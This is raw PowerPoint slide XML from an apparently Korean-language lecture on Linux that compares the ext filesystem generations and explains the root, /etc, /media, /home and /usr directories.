              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>문자만 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64MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 저장공간만의 사용이 가능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C560B09C-E352-4454-96EC-01F68500A213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789267" y="4299286"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00502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파일당 오직 한개의 타임스탬프</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널에 새로운 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</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파일이름으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>자를 사용가능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최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 저장 공간</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504D4B5F-0610-4DA4-890E-5D69618EE41D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600550" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007A37"/>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2</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2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gigabyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이상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파일시스템 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>크기는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>terabyte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이상</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용가능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정전 시 심각한 손상</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EE5582-E6C9-4A23-8202-F8BBFF7DF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517532" y="4299286"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00964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3</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3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Journaling (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일복구 기능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>데이터 안전하게 보호</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16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비트 내부 주소</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파일크기 최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2TB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C574AEDC-8E05-45CC-8598-C0842B76BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8223116" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>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4</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4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대용량 파일 시스템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단편화 문제 대한 성능 증가</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타임 스탬프를 개선</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메모리 할당 속도 증가</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC834F5D-95A5-4CF0-9B71-BA9B1F6ADFEC}"/>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7819B365-1B25-4A13-8F4C-E811DBA2A1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3FE850B-71F6-43B2-99AD-DD5D7DF2AEF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F24C890B-70F4-4E1B-B827-D2B55D418C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952127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0" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A063FD4-1F54-40FE-A3C3-A59EFABA0BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4965791" y="2109127"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="직사각형 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AE00E6-AD69-4DAE-87CD-46062ADE7F42}"/>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8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8C1FDB-A0C7-4698-9605-5CC477623B5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12" name="사각형: 둥근 모서리 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3EB499-195E-4017-8133-567E340C22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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EA29DF-F8D2-4555-B80F-052ABC5216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47" t="1269" r="13451" b="4377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="580444" y="1709043"/>
            <a:ext cx="3983183" cy="4834399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7776ADAE-1FE2-4A85-95B3-B65981CB1961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="162" r="53289" b="1649"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965791" y="3415652"/>
            <a:ext cx="6480893" cy="2805055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="직선 화살표 연결선 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2B4B89-DA9C-484A-A1D2-77AC42133982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4431836" y="2255928"/>
            <a:ext cx="53395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 name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4190FC02-9E16-41F1-AB3D-96A41E23A856}"/>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836572B2-86C3-461A-8D74-130264C9DB5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BCF748D-4E10-4098-9B86-275F8BCE1E3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A4E679C0-0622-4BF4-8F8A-0AAAE4F96CA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화살표: 오른쪽 16">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD49C3C3-8D23-4547-A872-FE2B4F2B1CC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562493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4" name="그룹 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15024397-6C5F-474C-85A3-0C0AF9A51530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="직사각형 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA7C7DDC-9B14-4B1E-BA14-6912EBE266D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/media</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FB5443-D50C-4B90-B542-41C5EB7C6A01}"/>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CD/DVD </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>또는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FDD, USB </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>등이 임시로 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트되는</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 역할 수행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17" name="사각형: 둥근 모서리 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D446D4-1D19-4AE8-B117-49D7115155AA}"/>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마운트 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D2BC99-C4B4-41BF-BECE-C88F7C2AD8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="3061636"/>
            <a:ext cx="366427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/etc</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 대한 환경 설정과 관련된 파일 및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 관리를 위한 암호 관련 파일</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네트워크 정보를 보유한 파일 등 시스템 관리에 전반적인 파일들 존재</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설정 파일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리눅스 시스템의 최상위 디렉토리</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>디렉토리 구조의 시작</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>리눅스는 루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>(/)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>를 기준으로 디렉토리를 생성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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>(Root) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>디렉토리</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="그룹 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4747D3D-08A0-46E2-B558-BBAEB9BCC0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="5525334"/>
            <a:ext cx="3664276" cy="1059652"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1059652"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="직사각형 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4A72D9-83CC-478F-B422-681B0DA5F4C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/home</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A93174-3291-480C-A251-FEB9851EABCF}"/>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계정을 사용하는 사용자들의 홈 디렉토리</a:t>
              </a:r>
            </a:p>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FTP, www </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>등과 같은 서비스 디렉토리들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원격접속을 시도하는 사용자들을 위한 공간으로 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="사각형: 둥근 모서리 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366DC359-8AEE-46DD-9F7D-55DCA56DE37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일반 사용자들의 홈 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="그룹 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653AEE22-AA5F-4762-A2BC-6D4E6522DC13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="직사각형 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3917340-CEB3-4D0F-8233-22317DEF3BA3}"/>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usr</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF7BD66-CBE8-4CA6-8067-31994C3C3B50}"/>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사용자가 사용할 응용 패키지 프로그램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사용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>윈도우 운영체제에서의 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>Program Files</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>와 같은 역할</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
